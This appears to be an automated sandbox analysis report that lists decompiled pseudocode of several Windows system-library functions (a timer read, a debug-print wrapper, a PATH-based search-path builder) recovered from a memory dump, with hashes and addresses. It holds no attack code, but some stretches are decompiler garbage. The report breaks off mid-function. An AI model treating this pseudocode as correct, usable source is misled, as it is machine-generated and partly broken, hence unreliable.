API ID: InitializeThunk String ID: Legacy$UEFI API String ID: 2994545307-634100481 Opcode ID: a5761e2c6a0d545f7a7fab6f55de0bc653e07faeb6d690732624ab77a10060cc Instruction ID: bb510a83412911ba654c978ae5fe5b71eb590f6e7dd4469b2c62aa1a96218713 Opcode Fuzzy Hash: a5761e2c6a0d545f7a7fab6f55de0bc653e07faeb6d690732624ab77a10060cc Instruction Fuzzy Hash: FD517C71E04609DFDB68DFA8C990BAEBBF9FB88B00F14402DE649EB255D7719900CB50

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%

E010DB944(signed int* __ecx, char __edx) { signed int _v8; signed int _v16; signed int _v20; char _v28; signed int _v32; char _v36; signed int _v40; intOrPtr _v44; signed int* _v48; signed int _v52; signed int _v56; intOrPtr _v60; intOrPtr _v64; intOrPtr _v68; intOrPtr _v72; intOrPtr _v76; char _v77; void* __ebx; void* __edi; void* __esi; intOrPtr* _t65; intOrPtr _t67; intOrPtr _t68; char* _t73; intOrPtr _t77; intOrPtr _t78; signed int _t82; intOrPtr _t83; void* _t87; char _t88; intOrPtr* _t89; intOrPtr _t91; void* _t97; intOrPtr _t100; void* _t102; void* _t107; signed int _t108; intOrPtr* _t112; void* _t113; intOrPtr* _t114; intOrPtr _t115; intOrPtr _t116; intOrPtr _t117; signed int _t118; void* _t130; _t120 = (_t118 & 0xfffffff8) - 0x4c; _v8 = *0x11ad360 ^ (_t118 & 0xfffffff8) - 0x0000004c; _t112 = __ecx; _v77 = __edx; _v48 = __ecx; _v28 = 0; _t5 = _t112 + 0xc; // 0x575651ff _t105 = *_t5; _v20 = 0; _v16 = 0; if(_t105 == 0) { _t50 = _t112 + 4; // 0x5de58b5b _t60 = *__ecx | *_t50; if(( *__ecx | *_t50) != 0) { *__ecx = 0; __ecx[1] = 0; if(E010D7D50() != 0) { _t65 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; } else { _t65 = 0x7ffe0386; } if( *_t65 != 0) { E01188CD6(_t112); } _push(0); _t52 = _t112 + 0x10; // 0x778df98b _push( *_t52); _t60 = E010F9E20(); } L20: _pop(_t107); _pop(_t113); _pop(_t87); return E010FB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113); } _t8 = _t112 + 8; // 0x8b000cc2 _t67 = *_t8; _t88 = *((intOrPtr*)(_t67 + 0x10)); _t97 = *((intOrPtr*)(_t105 + 0x10)) - _t88; _t108 = *(_t67 + 0x14); _t68 = *((intOrPtr*)(_t105 + 0x14)); _t105 = 0x2710; asm("sbb eax, edi"); _v44 = _t88; _v52 = _t108; _t60 = E010FCE00(_t97, _t68, 0x2710, 0); _v56 = _t60; if( *_t112 != _t88 || *(_t112 + 4) != _t108) { L3: *(_t112 + 0x44) = _t60; _t105 = _t60 * 0x2710 >> 0x20; *_t112 = _t88; *(_t112 + 4) = _t108; _v20 = _t60 * 0x2710; _v16 = _t60 * 0x2710 >> 0x20; if(_v77 != 0) { L16: _v36 = _t88; _v32 = _t108; if(E010D7D50() != 0) { _t73 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; } else { _t73 = 0x7ffe0386; } if( *_t73 != 0) { _t105 = _v40; E01188F6A(_t112, _v40, _t88, _t108); } _push( &_v28); _push(0); _push( &_v36); _t48 = _t112 + 0x10; // 0x778df98b _push( *_t48); _t60 = E010FAF60(); goto L20; } else { _t89 = 0x7ffe03b0; do { _t114 = 0x7ffe0010; do { _t77 = *0x11a8628; // 0x0 _v68 = _t77; _t78 = *0x11a862c; // 0x0 _v64 = _t78; _v72 = *_t89; _v76 = *((intOrPtr*)(_t89 + 4)); while(1) { _t105 = *0x7ffe000c; _t100 = *0x7ffe0008; if(_t105 == *_t114) { goto L8; } asm("pause"); } L8: _t89 = 0x7ffe03b0; _t115 = *0x7ffe03b0; _t82 = *0x7FFE03B4; _v60 = _t115; _t114 = 0x7ffe0010; _v56 = _t82; } while (_v72 != _t115 || _v76 != _t82); _t83 = *0x11a8628; // 0x0 _t116 = *0x11a862c; // 0x0 _v76 = _t116; _t117 = _v68; } while (_t117 != _t83 || _v64 != _v76); asm("sbb edx, [esp+0x24]"); _t102 = _t100 - _v60 - _t117; _t112 = _v48; _t91 = _v44; asm("sbb edx, eax"); _t130 = _t105 - _v52; if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) { _t88 = _t102 - _t91; asm("sbb edx, edi"); _t108 = _t105; } else { _t88 = 0; _t108 = 0; } goto L16; } } else { if( *(_t112 + 0x44) == _t60) { goto L20; } goto L3; } } 0x010db94c 0x010db956 0x010db95c 0x010db95e 0x010db964 0x010db969 0x010db96d 0x010db96d 0x010db970 0x010db974 0x010db97a 0x010dbadf 0x010dbadf 0x010dbae2 0x010dbae4 0x010dbae6 0x010dbaf0 0x01122cb8 0x010dbaf6 0x010dbaf6 0x010dbaf6 0x010dbafd 0x010dbb1f 0x010dbb1f 0x010dbaff 0x010dbb00 0x010dbb00 0x010dbb03 0x010dbb03 0x010dbacb 0x010dbacf 0x010dbad0 0x010dbad1 0x010dbadc 0x010dbadc 0x010db980 0x010db980 0x010db988 0x010db98b 0x010db98d 0x010db990 0x010db993 0x010db999 0x010db99b 0x010db9a1 0x010db9a5 0x010db9aa 0x010db9b0 0x010db9bb 0x010db9c0 0x010db9c3 0x010db9ca 0x010db9cc 0x010db9cf 0x010db9d3 0x010db9d7 0x010dba94 0x010dba94 0x010dba98 0x010dbaa3 0x01122ccb 0x010dbaa9 0x010dbaa9 0x010dbaa9 0x010dbab1 0x01122cd5 0x01122cdd 0x01122cdd 0x010dbabb 0x010dbabc 0x010dbac2 0x010dbac3 0x010dbac3 0x010dbac6 0x00000000 0x010db9dd 0x010db9dd 0x010db9e7 0x010db9e7 0x010db9ec 0x010db9ec 0x010db9f1 0x010db9f5 0x010db9fa 0x010dba00 0x010dba0c 0x010dba10 0x010dba10 0x010dba12 0x010dba18 0x00000000 0x00000000 0x010dbb26 0x010dbb26 0x010dba1e 0x010dba1e 0x010dba23 0x010dba25 0x010dba2c 0x010dba30 0x010dba35 0x010dba35 0x010dba41 0x010dba46 0x010dba4c 0x010dba50 0x010dba54 0x010dba6a 0x010dba6e 0x010dba70 0x010dba74 0x010dba78 0x010dba7a 0x010dba7c 0x010dba8e 0x010dba90 0x010dba92 0x010dbb14 0x010dbb14 0x010dbb16 0x010dbb16 0x00000000 0x010dba7c 0x010dbb0a 0x010dbb0d 0x00000000 0x00000000 0x00000000 0x010dbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010DB9A5

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@ String ID: API String ID: 885266447-0 Opcode ID: 201e99ef7798c92912d3fbcee0957a4c2877fe97159ac331ef6c33ba229b1660 Instruction ID: 221897eb62ae8f374644b1f36e1bb63744a1a9748532fb2b8023e56d32f8c48e Opcode Fuzzy Hash: 201e99ef7798c92912d3fbcee0957a4c2877fe97159ac331ef6c33ba229b1660 Instruction Fuzzy Hash: 10515571A08341CFC724DF2DC08092ABBE5BB89610F56896EFAD987345DB70E844CB92

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%

E010BB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) { signed int _t65; signed short _t69; intOrPtr _t70; signed short _t85; void* _t86; signed short _t89; signed short _t91; intOrPtr _t92; intOrPtr _t97; intOrPtr* _t98; signed short _t99; signed short _t101; void* _t102; char* _t103; signed short _t104; intOrPtr* _t110; void* _t111; void* _t114; intOrPtr* _t115; _t109 = __esi; _t108 = __edi; _t106 = __edx; _t95 = __ebx; _push(0x90); _push(0x118f7a8); E0110D0E8(__ebx, __edi, __esi); *((intOrPtr*)(_t114 - 0x9c)) = __edx; *((intOrPtr*)(_t114 - 0x84)) = __ecx; *((intOrPtr*)(_t114 - 0x8c)) = *((intOrPtr*)(_t114 + 0xc)); *((intOrPtr*)(_t114 - 0x88)) = *((intOrPtr*)(_t114 + 0x10)); *((intOrPtr*)(_t114 - 0x78)) = *[fs:0x18]; if(__edx == 0xffffffff) { L6: _t97 = *((intOrPtr*)(_t114 - 0x78)); _t65 = *(_t97 + 0xfca) & 0x0000ffff; __eflags = _t65 & 0x00000002; if((_t65 & 0x00000002) != 0) { L3: L4: return E0110D130(_t95, _t108, _t109); } *(_t97 + 0xfca) = _t65 | 0x00000002; _t108 = 0; _t109 = 0; _t95 = 0; __eflags = 0; while(1) { __eflags = _t95 - 0x200; if(_t95 >= 0x200) { break; } E010FD000(0x80); *((intOrPtr*)(_t114 - 0x18)) = _t115; _t108 = _t115; _t95 = _t95 - 0xffffff80; _t17 = _t114 - 4; *_t17 = *(_t114 - 4) & 0x00000000; __eflags = *_t17; _t106 = *((intOrPtr*)(_t114 - 0x84)); _t110 = *((intOrPtr*)(_t114 - 0x84)); _t102 = _t110 + 1; do { _t85 = *_t110; _t110 = _t110 + 1; __eflags = _t85; } while (_t85 != 0); _t111 = _t110 - _t102; _t21 = _t95 - 1; // -129 _t86 = _t21; __eflags = _t111 - _t86; if(_t111 > _t86) { _t111 = _t86; } E010FF3E0(_t108, _t106, _t111); _t115 = _t115 + 0xc; _t103 = _t111 + _t108; *((intOrPtr*)(_t114 - 0x80)) = _t103; _t89 = _t95 - _t111; __eflags = _t89; _push(0); if(_t89 == 0) { L15: _t109 = 0xc000000d; goto L16; } else { __eflags = _t89 - 0x7fffffff; if(_t89 <= 0x7fffffff) { L16: *(_t114 - 0x94) = _t109; __eflags = _t109; if(_t109 < 0) { __eflags = _t89; if(_t89 != 0) { *_t103 = 0; } L26: *(_t114 - 0xa0) = _t109; *(_t114 - 4) = 0xfffffffe; __eflags = _t109; if(_t109 >= 0) { L31: _t98 = _t108; _t39 = _t98 + 1; // 0x1 _t106 = _t39; do { _t69 = *_t98; _t98 = _t98 + 1; __eflags = _t69; } while (_t69 != 0); _t99 = _t98 - _t106; __eflags = _t99; L34: _t70 = *[fs:0x30]; __eflags = *((char*)(_t70 + 2)); if( *((char*)(_t70 + 2)) != 0) { L40: *((intOrPtr*)(_t114 - 0x74)) = 0x40010006; *(_t114 - 0x6c) = *(_t114 - 0x6c) & 0x00000000; *((intOrPtr*)(_t114 - 0x64)) = 2; *(_t114 - 0x70) = *(_t114 - 0x70) & 0x00000000; *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1; *((intOrPtr*)(_t114 - 0x5c)) = _t108; *(_t114 - 4) = 1; _push(_t114 - 0x74); L0110DEF0(_t99, _t106); *(_t114 - 4) = 0xfffffffe; *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) = *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd; goto L3; } __eflags = ( *0x7ffe02d4 & 0x00000003) - 3; if(( *0x7ffe02d4 & 0x00000003) != 3) { goto L40; } _push( *((intOrPtr*)(_t114 + 8))); _push( *((intOrPtr*)(_t114 - 0x9c))); _push(_t99 & 0x0000ffff); _push(_t108); _push(1); _t101 = E010FB280(); __eflags = *((char*)(_t114 + 0x14)) - 1; if( *((char*)(_t114 + 0x14)) == 1) { __eflags = _t101 - 0x80000003; if(_t101 == 0x80000003) { E010FB7E0(1); _t101 = 0; __eflags = 0; } } *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) = *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd; goto L4; } __eflags = _t109 - 0x80000005; if(_t109 == 0x80000005) { continue; } break; } *(_t114 - 0x90) = 0; *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1; _t91 = E010FE2D0(_t103, _t89 - 1, *((intOrPtr*)(_t114 - 0x8c)), *((intOrPtr*)(_t114 - 0x88))); _t115 = _t115 + 0x10; _t104 = _t91; _t92 = *((intOrPtr*)(_t114 - 0x7c)); __eflags = _t104; if(_t104 < 0) { L21: _t109 = 0x80000005; *(_t114 - 0x90) = 0x80000005; L22: *((char*)(_t92 + *((intOrPtr*)(_t114 - 0x80)))) = 0; L23: *(_t114 - 0x94) = _t109; goto L26; } __eflags = _t104 - _t92; if(__eflags > 0) { goto L21; } if(__eflags == 0) { goto L22; } goto L23; } goto L15; } } __eflags = _t109; if(_t109 >= 0) { goto L31; } __eflags = _t109 - 0x80000005; if(_t109 != 0x80000005) { goto L31; } *((short*)(_t95 + _t108 - 2)) = 0xa; _t38 = _t95 - 1; // -129 _t99 = _t38; goto L34; } if( *((char*)( *[fs:0x30] + 2)) != 0) { __eflags = __edx - 0x65; if(__edx != 0x65) { goto L2; } goto L6; } L2: _push( *((intOrPtr*)(_t114 + 8))); _push(_t106); if(E010FA890() != 0) { goto L6; } goto L3; } 0x010bb171 0x010bb171 0x010bb171 0x010bb171 0x010bb171 0x010bb176 0x010bb17b 0x010bb180 0x010bb186 0x010bb18f 0x010bb198 0x010bb1a4 0x010bb1aa 0x01114802 0x01114802 0x01114805 0x0111480c 0x0111480e 0x010bb1d1 0x010bb1d3 0x010bb1de 0x010bb1de 0x01114817 0x0111481e 0x01114820 0x01114822 0x01114822 0x01114824 0x01114824 0x0111482a 0x00000000 0x00000000 0x01114835 0x0111483a 0x0111483d 0x0111483f 0x01114842 0x01114842 0x01114842 0x01114846 0x0111484c 0x0111484e 0x01114851 0x01114851 0x01114853 0x01114854 0x01114854 0x01114858 0x0111485a 0x0111485a 0x0111485d 0x0111485f 0x01114861 0x01114861 0x01114866 0x0111486b 0x0111486e 0x01114871 0x01114876 0x01114876 0x01114878 0x0111487b 0x01114884 0x01114884 0x00000000 0x0111487d 0x0111487d 0x01114882 0x01114889 0x01114889 0x0111488f 0x01114891 0x011148e0 0x011148e2 0x011148e4 0x011148e4 0x011148e7 0x011148e7 0x011148ed 0x011148f4 0x011148f6 0x01114951 0x01114951 0x01114953 0x01114953 0x01114956 0x01114956 0x01114958 0x01114959 0x01114959 0x0111495d 0x0111495d 0x0111495f 0x0111495f 0x01114965 0x01114969 0x011149ba 0x011149ba 0x011149c1 0x011149c5 0x011149cc 0x011149d4 0x011149d7 0x011149da 0x011149e4 0x011149e5 0x011149f3 0x01114a02 0x00000000 0x01114a02 0x01114972 0x01114974 0x00000000 0x00000000 0x01114976 0x01114979 0x01114982 0x01114983 0x01114984 0x0111498b 0x0111498d 0x01114991 0x01114993 0x01114999 0x0111499d 0x011149a2 0x011149a2 0x011149a2 0x01114999 0x011149ac 0x00000000 0x011149b3 0x011148f8 0x011148fe 0x00000000 0x00000000 0x00000000 0x011148fe 0x01114895 0x0111489c 0x011148ad 0x011148b2 0x011148b5 0x011148b7 0x011148ba 0x011148bc 0x011148c6 0x011148c6 0x011148cb 0x011148d1 0x011148d4 0x011148d8 0x011148d8 0x00000000 0x011148d8 0x011148be 0x011148c0 0x00000000 0x00000000 0x011148c2 0x00000000 0x00000000 0x00000000 0x011148c4 0x00000000 0x01114882 0x0111487b 0x01114904 0x01114906 0x00000000 0x00000000 0x01114908 0x0111490e 0x00000000 0x00000000 0x01114910 0x01114917 0x01114917 0x00000000 0x01114917 0x010bb1ba 0x011147f9 0x011147fc 0x00000000 0x00000000 0x00000000 0x011147fc 0x010bb1c0 0x010bb1c0 0x010bb1c3 0x010bb1cb 0x00000000 0x00000000 0x00000000

APIs

_vswprintf_s.LIBCMT ref: 011148AD

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s String ID: API String ID: 677850445-0 Opcode ID: 80562f494f45266f3b60def16d70441d7437499eb52d7599eea860a5905d0e47 Instruction ID: d2f48aa4f59eecc71350ca58549a78c50c9a3d24f26a07fef2d96957423411c2 Opcode Fuzzy Hash: 80562f494f45266f3b60def16d70441d7437499eb52d7599eea860a5905d0e47 Instruction Fuzzy Hash: E651D371D002598FEF39CFA8C845BEEBBB1AF04B10F1041BDD999ABA86D7704941CB91

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%

E010E2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35) { signed int _v8; signed int _v16; unsigned int _v24; void* _v28; signed int _v32; unsigned int _v36; void* _v37; signed int _v40; signed int _v44; signed int _v48; signed int _v52; signed int _v56; intOrPtr _v60; signed int _v64; signed int _v68; signed int _v72; signed int _v76; signed int _v80; signed int _t240; signed int _t244; void* _t245; signed int _t251; signed int _t253; intOrPtr _t255; signed int _t258; signed int _t265; signed int _t268; signed int _t276; intOrPtr _t282; signed int _t284; signed int _t286; void* _t287; signed int _t288; signed int _t289; unsigned int _t292; signed int _t296; void* _t297; signed int _t298; signed int _t302; intOrPtr _t314; signed int _t323; signed int _t325; signed int _t326; signed int _t330; signed int _t331; signed int _t333; signed int _t335; signed int _t337; void* _t338; void* _t340; void* _t341; _t335 = _t337; _t338 = _t337 - 0x4c; _v8 = *0x11ad360 ^ _t335; _push(__ebx); _push(__esi); _push(__edi); _t330 = 0x11ab2e8; _v56 = _a4; _v48 = __edx; _v60 = __ecx; _t292 = 0; _v80 = 0; asm("movsd"); _v64 = 0; _v76 = 0; _v72 = 0; asm("movsd"); _v44 = 0; _v52 = 0; _v68 = 0; asm("movsd"); _v32 = 0; _v36 = 0; asm("movsd"); _v16 = 0; _t341 = (_v24 >> 0x0000001c & 0x00000003) - 1; _t282 = 0x48; _t312 = 0 | _t341 == 0x00000000; _t323 = 0; _v37 = _t341 == 0; if(_v48 <= 0) { L16: _t45 = _t282 - 0x48; // 0x0 __eflags = _t45 - 0xfffe; if(_t45 > 0xfffe) { _t331 = 0xc0000106; goto L32; } else { _t330 = L010D4620(_t292, *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t282); _v52 = _t330; __eflags = _t330; if(_t330 == 0) { _t331 = 0xc0000017; goto L32; } else { *(_t330 + 0x44) = *(_t330 + 0x44) & 0x00000000; _t50 = _t330 + 0x48; // 0x48 _t325 = _t50; _t312 = _v32; *((intOrPtr*)(_t330 + 0x3c)) = _t282; _t284 = 0; *((short*)(_t330 + 0x30)) = _v48; __eflags = _t312; if(_t312 != 0) { *(_t330 + 0x18) = _t325; __eflags = _t312 - 0x11a8478; *_t330 = ((0 | _t312 == 0x011a8478) - 0x00000001 & 0xfffffffb) + 7; E010FF3E0(_t325, *((intOrPtr*)(_t312 + 4)), *_t312 & 0x0000ffff); _t312 = _v32; _t338 = _t338 + 0xc; _t284 = 1; __eflags = _a8; _t325 = _t325 + (( *_t312 & 0x0000ffff) >> 1) * 2; if(_a8 != 0) { _t276 = E011439F2(_t325); _t312 = _v32; _t325 = _t276; } } _t296 = 0; _v16 = 0; __eflags = _v48; if(_v48 <= 0) { L31: _t331 = _v68; __eflags = 0; *((short*)(_t325 - 2)) = 0; goto L32; } else { _t286 = _t330 + _t284 * 4; _v56 = _t286; do { __eflags = _t312; if(_t312 != 0) { _t240 = *(_v60 + _t296 * 4); __eflags = _t240; if(_t240 == 0) { goto L30; } else { __eflags = _t240 == 5; if(_t240 == 5) { goto L30; } else { goto L22; } } } else { L22: *_t286 = *(_v60 + _t296 * 4); *(_t286 + 0x18) = _t325; _t244 = *(_v60 + _t296 * 4); __eflags = _t244 - 8; if(_t244 > 8) { goto L56; } else { switch( *((intOrPtr*)(_t244 * 4 + &M010E2959))) { case 0: __ax = *0x11a8488; __eflags = __ax; if(__ax == 0) { goto L29; } else { __ax & 0x0000ffff = E010FF3E0(__edi, *0x11a848c, __ax & 0x0000ffff); __eax = *0x11a8488 & 0x0000ffff; goto L26; } goto L108; case 1: L45: E010FF3E0(_t325, _v80, _v64); _t271 = _v64; goto L26; case 2: *0x11a8480 & 0x0000ffff = E010FF3E0(__edi, *0x11a8484, *0x11a8480 & 0x0000ffff); __eax = *0x11a8480 & 0x0000ffff; __eax = ( *0x11a8480 & 0x0000ffff) >> 1; __edi = __edi + __eax * 2; goto L28; case 3: __eax = _v44; __eflags = __eax; if(__eax == 0) { goto L29; } else { __esi = __eax + __eax; __eax = E010FF3E0(__edi, _v72, __esi); __edi = __edi + __esi; __esi = _v52; goto L27; } goto L108; case 4: _push(0x2e); _pop(__eax); *(__esi + 0x44) = __edi; *__edi = __ax; __edi = __edi + 4; _push(0x3b); _pop(__eax); *(__edi - 2) = __ax; goto L29; case 5: __eflags = _v36; if(_v36 == 0) { goto L45; } else { E010FF3E0(_t325, _v76, _v36); _t271 = _v36; } L26: _t338 = _t338 + 0xc; _t325 = _t325 + (_t271 >> 1) * 2 + 2; __eflags = _t325; L27: _push(0x3b); _pop(_t273); *((short*)(_t325 - 2)) = _t273; goto L28; case 6: __ebx = "\\Wow\\Wow"; __eflags = __ebx - "\\Wow\\Wow"; if(__ebx != "\\Wow\\Wow") { _push(0x3b); _pop(__esi); do { *(__ebx + 8) & 0x0000ffff = __ebx + 0xa; E010FF3E0(__edi, __ebx + 0xa, *(__ebx + 8) & 0x0000ffff) = *(__ebx + 8) & 0x0000ffff; __eax = ( *(__ebx + 8) & 0x0000ffff) >> 1; __edi = __edi + __eax * 2; __edi = __edi + 2; *(__edi - 2) = __si; __ebx = *__ebx; __eflags = __ebx - "\\Wow\\Wow"; } while (__ebx != "\\Wow\\Wow"); __esi = _v52; __ecx = _v16; __edx = _v32; } __ebx = _v56; goto L29; case 7: *0x11a8478 & 0x0000ffff = E010FF3E0(__edi, *0x11a847c, *0x11a8478 & 0x0000ffff); __eax = *0x11a8478 & 0x0000ffff; __eax = ( *0x11a8478 & 0x0000ffff) >> 1; __eflags = _a8; __edi = __edi + __eax * 2; if(_a8 != 0) { __ecx = __edi; __eax = E011439F2(__ecx); __edi = __eax; } goto L28; case 8: __eax = 0; *(__edi - 2) = __ax; *0x11a6e58 & 0x0000ffff = E010FF3E0(__edi, *0x11a6e5c, *0x11a6e58 & 0x0000ffff); *(__esi + 0x38) = __edi; __eax = *0x11a6e58 & 0x0000ffff; __eax = ( *0x11a6e58 & 0x0000ffff) >> 1; __edi = __edi + __eax * 2; __edi = __edi + 2; L28: _t296 = _v16; _t312 = _v32; L29: _t286 = _t286 + 4; __eflags = _t286; _v56 = _t286; goto L30; } } } goto L108; L30: _t296 = _t296 + 1; _v16 = _t296; __eflags = _t296 - _v48; } while (_t296 < _v48); goto L31; } } } } else { while(1) { L1: _t244 = *(_v60 + _t323 * 4); if(_t244 > 8) { break; } switch( *((intOrPtr*)(_t244 * 4 + &M010E2935))) { case 0: __ax = *0x11a8488; __eflags = __ax; if(__ax != 0) { __eax = __ax & 0x0000ffff; __ebx = __ebx + 2; __eflags = __ebx; goto L53; } goto L14; case 1: L44: _t312 = &_v64; _v80 = E010E2E3E(0, &_v64); _t282 = _t282 + _v64 + 2; goto L13; case 2: __eax = *0x11a8480 & 0x0000ffff; __ebx = __ebx + __eax; __eflags = __dl; if(__dl != 0) { __eax = 0x11a8480; goto L80; } goto L14; case 3: __eax = E010CEEF0(0x11a79a0); __eax = &_v44; _push(__eax); _push(0); _push(0); _push(4); _push(L"PATH"); _push(0); L57(); __esi = __eax; _v68 = __esi; __eflags = __esi - 0xc0000023; if(__esi != 0xc0000023) { L10: __eax = E010CEB70(__ecx, 0x11a79a0); __eflags = __esi - 0xc0000100; if(__esi == 0xc0000100) { _v44 = _v44 & 0x00000000; __eax = 0; _v68 = 0; goto L13; } else { __eflags = __esi; if(__esi < 0) { L32: _t218 = _v72; __eflags = _t218; if(_t218 != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218); } _t219 = _v52; __eflags = _t219; if(_t219 != 0) { __eflags = _t331; if(_t331 < 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219); _t219 = 0; } } goto L36; } else { __eax = _v44; __ebx = __ebx + __eax * 2; __ebx = __ebx + 2; __eflags = __ebx; L13: _t292 = _v36; goto L14; } } } else { __eax = _v44; __ecx = *0x11a7b9c; // 0x0 _v44 + _v44 = *[fs:0x30]; __ecx = __ecx + 0x180000; __eax = L010D4620(__ecx, *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx, *[fs:0x30]); _v72 = __eax; __eflags = __eax; if(__eax == 0) { __eax = E010CEB70(__ecx, 0x11a79a0); __eax = _v52; L36: _pop(_t324); _pop(_t332); __eflags = _v8 ^ _t335; _pop(_t283); return E010FB640(_t219, _t283, _v8 ^ _t335, _t312, _t324, _t332); } else { __ecx = &_v44; _push(__ecx); _push(_v44); _push(__eax); _push(4); _push(L"PATH"); _push(0); L57(); __esi = __eax; _v68 = __eax; goto L10; } } goto L108; case 4: __ebx = __ebx + 4; goto L14; case 5: _t278 = _v56; if(_v56 != 0) { _t312 = &_v36; _t280 = E010E2E3E(_t278, &_v36); _t292 = _v36; _v76 = _t280; } if(_t292 == 0) { goto L44; } else { _t282 = _t282 + 2 + _t292; } goto L14; case 6: __eax = *0x11a5764 & 0x0000ffff; goto L53; case 7: __eax = *0x11a8478 & 0x0000ffff; __ebx = __ebx + __eax; __eflags = _a8; if(_a8 != 0) { __ebx = __ebx + 0x16; __ebx = __ebx + __eax; } __eflags = __dl; if(__dl != 0) { __eax = 0x11a8478; L80: _v32 = __eax; } goto L14; case 8: __eax = *0x11a6e58 & 0x0000ffff; __eax = ( *0x11a6e58 & 0x0000ffff) + 2; L53: __ebx = __ebx + __eax; L14: _t323 = _t323 + 1; if(_t323 >= _v48) { goto L16; } else { _t312 = _v37; goto L1; } goto L108; } } L56: _t297 = 0x25; asm("int 0x29"); asm("out 0x28, al"); _push(cs); *((intOrPtr*)(_t330 + 0x28)) = *((intOrPtr*)(_t330 + 0x28)) + _t338; _push(cs); _t245 = _t244 + _t338; asm("daa"); _push(cs); *_t330 = *_t330 + _t335; _push(cs); *((intOrPtr*)(_t330 + 0x28)) = *((intOrPtr*)(_t330 + 0x28)) + _t245; *0x1f010e26 = *0x1f010e26 + _t245; _t287 = cs; asm("adc al, [ecx]"); _t246 = _t338; _t340 = _t245; *_t330 = *_t330 - _t297; *0x201125b = *0x201125b + _t330; *_t330 = *_t330 - _t297; *((intOrPtr*)(_t246 - 0x9fef1d8)) = *((intOrPtr*)(_t338 - 0x9fef1d8)) + _t338; asm("daa"); _push(cs); *_t330 = *_t330 + _t287; *_t330 = *_t330 - _t297; *((intOrPtr*)(_t330 + 0x28)) = *((intOrPtr*)(_t330 + 0x28)) + _t297; _push(cs); _a35 = _a35 + _t287; _t288 = cs; asm("adc al, [ecx]"); _push(cs); *((intOrPtr*)(_t340 + _t288 * 2)) = *((intOrPtr*)(_t340 + _t288 * 2)) + _t330; asm("adc al, [ecx]"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); _push(0x20); _push(0x118ff00); E0110D08C(_t288, _t325, _t330); _v44 = *[fs:0x18]; _t326 = 0; *_a24 = 0; _t289 = _a12; __eflags = _t289; if(_t289 == 0) { _t251 = 0xc0000100; } else { _v8 = 0; _t333 = 0xc0000100; _v52 = 0xc0000100; _t253 = 4; while(1) { _v40 = _t253; __eflags = _t253; if(_t253 == 0) { break; } _t302 = _t253 * 0xc; _v48 = _t302; __eflags = _t289 - *((intOrPtr*)(_t302 + 0x1091664)); if(__eflags <= 0) { if(__eflags == 0) { _t268 = E010FE5C0(_a8, *((intOrPtr*)(_t302 + 0x1091668)), _t289); _t340 = _t340 + 0xc; __eflags = _t268; if(__eflags == 0) { _t333 = E011351BE(_t289, *((intOrPtr*)(_v48 + 0x109166c)), _a16, _t326, _t333, __eflags, _a20, _a24); _v52 = _t333; break; } else { _t253 = _v40; goto L62; } goto L70; } else { L62: _t253 = _t253 - 1; continue; } } break; } _v32 = _t333; __eflags = _t333; if(_t333 < 0) { __eflags = _t333 - 0xc0000100; if(_t333 == 0xc0000100) { _t298 = _a4; __eflags = _t298; if(_t298 != 0) { _v36 = _t298; __eflags = *_t298 - _t326; if( *_t298 == _t326) { _t333 = 0xc0000100; goto L76; } else { _t314 = *((intOrPtr*)(_v44 + 0x30)); _t255 = *((intOrPtr*)(_t314 + 0x10)); __eflags = *((intOrPtr*)(_t255 + 0x48)) - _t298; if( *((intOrPtr*)(_t255 + 0x48)) == _t298) { __eflags = *(_t314 + 0x1c); if( *(_t314 + 0x1c) == 0) { L106: _t333 = E010E2AE4( &_v36, _a8, _t289, _a16, _a20, _a24); _v32 = _t333; __eflags = _t333 - 0xc0000100; if(_t333 != 0xc0000100) { goto L69; } else { _t326 = 1; _t298 = _v36; goto L75; } } else { _t258 = E010C6600( *(_t314 + 0x1c)); __eflags = _t258; if(_t258 != 0) { goto L106; } else { _t298 = _a4; goto L75; } } } else { L75: _t333 = E010E2C50(_t298, _a8, _t289, _a16, _a20, _a24, _t326); L76: _v32 = _t333; goto L69; } } goto L108; } else { E010CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c))); _v8 = 1; _v36 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48)); _t333 = _a24; _t265 = E010E2AE4( &_v36, _a8, _t289, _a16, _a20, 